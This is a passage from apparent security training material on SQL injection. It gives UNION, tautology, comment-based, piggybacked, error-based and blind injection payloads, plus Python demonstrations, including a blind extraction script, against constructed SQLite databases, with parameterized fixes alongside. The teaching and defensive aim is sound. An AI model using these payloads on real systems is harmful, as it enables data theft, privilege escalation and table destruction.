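    both the injection point and the surrounding query structure."""
    return lookup_vulnerable(conn, username)[1]


if __name__ == "__main__":
    db = make_db()
    print("Bob   ->", probe(db, "Bob"))
    print("Bob'  ->", probe(db, "Bob'"))
```

The second print shows the SQLite message "unrecognized token" followed by the unterminated string, which contains the AND password='' fragment the application never meant to reveal; the parameterized lookup_safe treats Bob' as an ordinary, non-matching username.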
- UNION SQL Injection

  The "UNION SELECT" statement returns the union of the intended dataset and the target dataset. In a UNION SQL injection, an attacker uses a UNION clause to append a malicious query to the requested query, as shown in the following example:

    SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable

- Tautology

  In a tautology-based SQL injection attack, an attacker uses a conditional OR clause such that the condition of the WHERE clause will always be true. Such an attack can be used to bypass user authentication. For example,

    SELECT * FROM users WHERE name = '' OR '1'='1'

  This query will always be true, as the second part of the OR clause is always true.

- End-of-Line Comment

  In this type of SQL injection, an attacker uses line comments in specific SQL injection inputs. Comments in a line of code are often denoted by (--), and they are ignored by the query. An attacker takes advantage of this commenting feature by writing a line of code that ends in a comment. The database will execute the code until it reaches the commented portion, after which it will ignore the rest of the query. For example,

    SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'

- In-line Comments

  Attackers simplify an SQL injection attack by integrating multiple vulnerable inputs into a single query using in-line comments. This type of injection allows an attacker to bypass blacklisting, remove spaces, obfuscate, and determine database versions. For example,

    INSERT INTO Users (UserName, isAdmin, Password) VALUES ('".$username."', 0, '".$password."')

  is a dynamic query that prompts a new user to enter a username and password. The attacker may provide malicious inputs as follows:

    UserName = Attacker', 1, /*
    Password = */'mypwd

  After these malicious inputs are injected, the generated query gives the attacker administrator privileges, because the literal 0 for isAdmin is swallowed by the comment:

    INSERT INTO Users (UserName, isAdmin, Password) VALUES ('Attacker', 1, /*', 0, '*/'mypwd')

- Piggybacked Query

  For example, the original SQL query is as follows:

    SELECT * FROM EMP WHERE EMP.EID = 1001 AND EMP.ENAME = 'Bob'

  Now, the attacker concatenates the delimiter (;) and the malicious query to the original query as follows:
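Added example, not courseware code: the in-line comment trick from the INSERT above, executed against SQLite from Python, followed by a check of what a piggybacked second statement does under two different driver calls. The Users table mirrors the INSERT shown above; the Creditcard table, the helper names, and the attacker strings are constructed for the example. Whether a driver accepts several statements in one call is what decides if piggybacking works at all, so the block exercises both sqlite3 paths.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema: the Users table from the INSERT above plus a table
    worth destroying, so a piggybacked DROP has something to hit."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT, isAdmin INTEGER, Password TEXT)")
    conn.execute("CREATE TABLE Creditcard (number TEXT)")
    return conn


def build_register_sql(username: str, password: str) -> str:
    """The dynamic registration query: every new account is meant to get isAdmin = 0."""
    return ("INSERT INTO Users (UserName, isAdmin, Password) VALUES ('"
            + username + "', 0, '" + password + "')")


def register(conn, username: str, password: str):
    """Runs the dynamic INSERT and returns every row in Users (oldest first)."""
    conn.execute(build_register_sql(username, password))
    return conn.execute(
        "SELECT UserName, isAdmin, Password FROM Users ORDER BY rowid").fetchall()


# Constructed attacker input for the piggybacked-query check: closes the
# VALUES list, appends a second statement, and comments out the remainder.
PIGGYBACK_USERNAME = "x', 0, 'y'); DROP TABLE Creditcard; --"


def piggyback(conn, use_script: bool):
    """Appends a second statement after the INSERT. Returns
    (second_statement_ran, creditcard_table_still_exists)."""
    sql = build_register_sql(PIGGYBACK_USERNAME, "")
    try:
        if use_script:
            conn.executescript(sql)   # runs every statement in the string
        else:
            conn.execute(sql)         # sqlite3 refuses more than one statement
        ran = True
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        ran = False
    exists = conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name='Creditcard'"
    ).fetchone() is not None
    return ran, exists


if __name__ == "__main__":
    db = make_db()
    print(register(db, "alice", "pw")[-1])                   # ('alice', 0, 'pw')
    print(register(db, "Attacker', 1, /*", "*/'mypwd")[-1])  # ('Attacker', 1, 'mypwd')
    print(piggyback(make_db(), use_script=False))            # (False, True)
    print(piggyback(make_db(), use_script=True))             # (True, False)
```

The second register call shows the comment swallowing the hard-coded 0 so that isAdmin becomes 1. The two piggyback calls show the same attacker string being rejected by execute(), which accepts exactly one statement, and succeeding through executescript(), which is the behaviour of any API that runs a batch of statements; the Creditcard table survives in the first case and is gone in the second.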
Error-Based SQL Injection

Let us understand the details of error-based SQL injection. As discussed earlier, in error-based SQL injection, the attacker forces the database to return error messages in response to his/her inputs. Later, the attacker may analyze the error messages obtained from the underlying database to gather information that can be used for constructing the malicious query. The attacker uses this type of SQL injection technique when he/she is unable to exploit any other SQL injection technique directly. The primary goal of this technique is to generate an error message from the database, which can be used to perform a successful SQL injection attack. Such exploitation may differ from one DBMS to another.

Consider the following SQL query:

    SELECT * FROM products WHERE id_product=$id_product

Consider the request to a script that executes the query above:

    http://www.example.com/product.php?id=10

The malicious request would be (e.g., Oracle 10g):

    http://www.example.com/product.php?id=10||UTL_INADDR.GET_HOST_NAME((SELECT user FROM DUAL))--

In the aforementioned example, the tester concatenates the value 10 with the result of the function UTL_INADDR.GET_HOST_NAME. This Oracle function will try to return the hostname of the parameter passed to it, which is another query, i.e., the name of the database user. When the database looks for a host matching the user name, it will fail and return an error message such as

    ORA-29257: host SCOTT unknown

Then, the tester can manipulate the parameter passed to the GET_HOST_NAME() function, and the result will be shown in the error message.
UNION SQL Injection

This technique involves joining a forged query to the original query. The result of the forged query will be joined to the result of the original query, thereby allowing the attacker to obtain the values of fields from other tables. For example,

    SELECT Name, Phone, Address FROM Users WHERE Id=$id

Now, set the following Id value:

    $id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable

The attacker now launches a UNION SQL injection query as follows:

    SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable

The above query joins the result of the original query with all the credit card numbers. For the UNION to succeed, the forged SELECT must return the same number of columns as the original query, with compatible types; the constants 1,1 pad the forged query out to three columns, and a wrong count produces a database error that itself tells the attacker how many columns to use.
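The following is an added example (not courseware code) of the UNION injection above against SQLite from Python: the id parameter is concatenated unquoted, the forged SELECT pulls card numbers into the result set, a forged SELECT with the wrong column count fails with the error an attacker uses to tune the payload, and a hardened lookup that validates and binds the id rejects the same input. The Users and CreditCardTable contents and the card numbers are constructed test data.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed tables: two users and two (fake) card numbers."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Id INTEGER, Name TEXT, Phone TEXT, Address TEXT)")
    conn.execute("CREATE TABLE CreditCardTable (creditCardNumber TEXT)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?, ?, ?)",
        [(1, "Jason", "555-0100", "1 Evergreen Terrace"),
         (2, "Bob", "555-0101", "2 Elm St")],
    )
    conn.executemany(
        "INSERT INTO CreditCardTable VALUES (?)",
        [("4111111111111111",), ("5500000000000004",)],
    )
    return conn


UNION_PAYLOAD = "1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable"
BAD_COLUMN_COUNT = "1 UNION ALL SELECT creditCardNumber FROM CreditCardTable"


def user_details(conn, id_value: str):
    """Vulnerable: $id is pasted into the query unquoted, as in ?id=...
    Returns (rows, error_text)."""
    sql = "SELECT Name, Phone, Address FROM Users WHERE Id=" + id_value
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        return [], str(exc)


def user_details_safe(conn, id_value: str):
    """Hardened: the id must parse as an integer and is bound as a parameter,
    so a UNION clause can never become part of the statement."""
    try:
        id_int = int(id_value)
    except ValueError:
        return []
    return conn.execute(
        "SELECT Name, Phone, Address FROM Users WHERE Id=?", (id_int,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(user_details(db, "1"))
    print(user_details(db, UNION_PAYLOAD))      # user row followed by card numbers
    print(user_details(db, BAD_COLUMN_COUNT))   # column-count error text
    print(user_details_safe(db, UNION_PAYLOAD)) # []
```

The wrong-column-count case returns SQLite's message that the two SELECTs do not have the same number of result columns; an attacker adds or removes padding constants until that error disappears, which is why the padded 1,1 appears in the page's payload.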
Blind/Inferential SQL Injection

Blind SQL injection is used when a web application is vulnerable to SQL injection, but the results of the injection are not visible to the attacker. It is identical to a normal SQL injection, except that when an attacker attempts to exploit an application, a generic custom page is displayed rather than a useful error message. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. Nevertheless, it is not impossible for the attacker to perform an SQL injection attack on such an application. Blind injection differs from normal SQL injection in the manner of retrieving
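Added example, not part of the courseware: a Boolean-based blind extraction against a constructed SQLite-backed page that reveals only whether a product row exists. It recovers a secret value one bit per request, which is what makes the attack time-intensive as the text says. The page function, the products and users tables, and the secret are all constructed for the example; length(), substr(), unicode() and the >> and & operators are SQLite syntax and would be spelled differently on other engines.

```python
import sqlite3

SECRET = "s3cret"  # constructed value the attacker does not know


def make_app():
    """Constructed target: returns a page() function that answers only
    True (product shown) or False (generic page), never any data or error."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    conn.execute("INSERT INTO products VALUES (10, 'widget')")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', ?)", (SECRET,))

    def page(id_param: str) -> bool:
        # Vulnerable: ?id= is concatenated. Errors and empty results look
        # identical to the client, so only one bit of information leaks out.
        sql = "SELECT name FROM products WHERE id=" + id_param
        try:
            return conn.execute(sql).fetchone() is not None
        except sqlite3.Error:
            return False
    return page


def ask(page, condition: str) -> bool:
    """One inference: is the product still shown when `condition` is ANDed on?"""
    return page("10 AND (" + condition + ")")


def extract(page, subquery: str, max_len: int = 32) -> str:
    """Boolean-based blind extraction, one request per bit.
    `subquery` must be a scalar SQL expression, e.g.
    (SELECT password FROM users WHERE name='admin')."""
    # Step 1: find the length with a bounded linear scan.
    length = 0
    for n in range(max_len + 1):
        if ask(page, f"length({subquery}) = {n}"):
            length = n
            break
    # Step 2: recover each character 7 bits at a time (ASCII assumed here).
    out = []
    for pos in range(1, length + 1):
        code = 0
        for bit in range(7):
            if ask(page, f"(unicode(substr({subquery},{pos},1)) >> {bit}) & 1 = 1"):
                code |= 1 << bit
        out.append(chr(code))
    return "".join(out)


if __name__ == "__main__":
    page = make_app()
    print(extract(page, "(SELECT password FROM users WHERE name='admin')"))
```

For the six-character secret this costs seven requests for the length scan plus 42 bit tests, each a separate HTTP request in a real attack; a binary search on the character value instead of a bit test, or a time-based variant when even the True/False difference is hidden, changes the cost but not the principle.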